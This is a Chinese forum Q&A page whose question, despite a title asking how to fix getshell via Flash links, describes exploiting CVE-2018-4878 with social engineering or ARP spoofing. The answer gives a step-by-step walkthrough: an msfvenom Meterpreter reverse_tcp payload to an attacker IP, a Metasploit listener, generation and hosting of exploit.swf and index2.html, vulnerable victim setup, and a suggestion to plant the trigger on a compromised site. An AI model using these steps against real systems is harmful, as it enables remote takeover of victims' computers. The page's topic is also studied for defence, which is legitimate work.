[问答]

用户用浏览器/邮件/Office 访问Flash链接被getshell应该如何解决？

9583

问答对人有帮助，内容完整，我也想知道答案 0 从公众号获取到一份“ATT&CK手册”，看到了这个漏洞CVE-2018-4878，但是一直没实操，今天刚好有点时间记录下，但是内容基本和网上的资料差不多，，，利用场景：攻击者通过构造特殊的 Flash 链接，当用户用浏览器/邮件/Office 访问此 Flash 链接时，会被“远程代码执行”，并且直接被 getshell。一般来说可以配合社工，如果在内网环境可以配合arp欺骗一起利用，效果更佳。 0
2020-11-9 07:15:14　　评论淘帖0 邀请回答您可以邀请以下用户，快速回答问题 × 陈该类别下有 5 个回答。邀请回答 jf_71236567 该类别下有 3 个回答。邀请回答 yhsales 该类别下有 2 个回答。邀请回答 puzhang549 该类别下有 2 个回答。邀请回答 ZONEK 该类别下有 2 个回答。邀请回答 tijing忽忽该类别下有 2 个回答。邀请回答 HELLOKITTYNEW 该类别下有 2 个回答。邀请回答 dlksmad 该类别下有 2 个回答。邀请回答 nvwwerwr 该类别下有 2 个回答。邀请回答 mu0543 该类别下有 2 个回答。邀请回答 60user28 该类别下有 2 个回答。邀请回答 To7ny 该类别下有 2 个回答。邀请回答月夜愁思该类别下有 1 个回答。邀请回答 iujwers 该类别下有 1 个回答。邀请回答南京恒基诚信该类别下有 1 个回答。邀请回答 expli 该类别下有 1 个回答。邀请回答 gdutzy 该类别下有 1 个回答。邀请回答 wanglinhua2627 该类别下有 1 个回答。邀请回答 PCB72991835 该类别下有 1 个回答。邀请回答 jf_38600196 该类别下有 1 个回答。邀请回答举报易里更相关推荐 • Win7怎么解决IE浏览器未响应的问题 2466 • 为什么开发板自带的浏览器输入网址不跳转呢 1464 • TCP协议是如何保证页面文件能被完整送达浏览器的 1121 • 基于LINUX的嵌入式浏览器该怎么设计？ 2191 • 用什么浏览器好？ 2975 • 用labview使用网页浏览器 8222 • labview怎么调用谷歌浏览器或者火狐浏览器，（非IE浏览器） 8850 • webnet使用浏览器刷新失败如何解决 1781 • 用作代理的单元是否也可以是将信息中继到浏览器的网络服务器？ 218 • 如何用浏览器打开Axure设置？ 1159 1个回答

答案对人有帮助，有参考价值 0 1、生成反弹脚本 msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.2.128 lport=4444 -f python>shellcode.txt 2、覆盖CVE-2018-4878.py payload部分。 2、msf监听反弹 msfconsole #启动msfuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 172.16.2.128set lport 4444run 3、CVE-2018-4878.py 生成exploit.swf、index2.html 只需要修改python代码中的绝对路径生成文件，只需要运行python文件就好。 4、访问下载把exploit.swf、index2.html放在任何目标可以访问到的地方即可。我这里是用的kali只带的apache服务。 5、受害者环境 Flash：AdobeFlashPlayer28.0.x（具体小版本没测过），安装即可。浏览器：ie8或者使用ie8内核的浏览器。这里啰嗦一句户，我这win7系统标配就是ie9，可以在“安装更新”里面卸载ie9的更新。 6、访问攻击页面说了可能不相信，我用ie8直接访问目标没反应，用这个12345浏览器居然可以，没整太明白。。。访问就这个效果，其实核心代码“”就这句，那可以各种猥琐的玩，譬如你把这句放在shell的首页，，， 6、msf接收到反弹请求到这里基本是结束了，msf大法可以自己多百度下。

2020-11-9 14:27:31 评论举报孙世珍